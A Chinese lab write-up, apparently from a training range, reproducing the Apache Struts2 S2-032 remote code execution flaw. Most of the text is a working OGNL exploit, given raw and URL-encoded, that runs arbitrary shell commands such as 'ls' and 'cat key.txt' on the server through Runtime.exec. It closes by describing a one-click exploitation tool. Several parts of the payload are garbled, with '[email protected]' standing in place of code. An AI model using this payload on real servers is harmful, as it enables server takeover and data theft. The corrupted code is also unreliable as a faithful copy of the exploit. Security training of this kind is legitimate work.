墨者学院之Apache Struts2远程代码执行漏洞(S2-032)复现

本题的解题方向是struts2的S2-032漏洞，启用动态方法调用时，可以通过方法：前缀执行远程代码执行。

method: < name > Action 前缀去调用声明为 public 的函数，但是在低版本 的Strtus2中并不会对 name 方法值做 OGNL 计算，反而在高版本中会进行计算。

 

其中需要利用exp进行实现：

首先构造poc

编码前：由编码后解析成的代码

？method:#[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&pp=\A&ppp= &encoding=UTF-8&cmd=ls

ls可更换成其他命令

编码后：

?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=ls

在浏览器地址栏输入http://靶场ip/上面编码后的exp

查看key.txt的值

编码前：由编码后解析成的代码

?method:#[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&pp=\A&ppp= &encoding=UTF-8&cmd=cat key.txt

 

编码后：

?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat key.txt

在浏览器地址栏输入http://靶场ip/上面编码后的exp

 

得到key值！

 

如果不知道exp怎么办，没关系，还有另一种办法，我们可以利用struts2的漏洞利用检查工具来进行一键式操作

提交方式修改成get方式，然后点击验证漏洞

得知有漏洞后，我们可以开始命令执行，在漏洞编号处选择刚才扫描出来的漏洞编号。输入ls命令，可以看到所有的文件。其中看到了key.txt文件。于是我们再输入cat key.txt命令查看该文件内容，得到了本题的key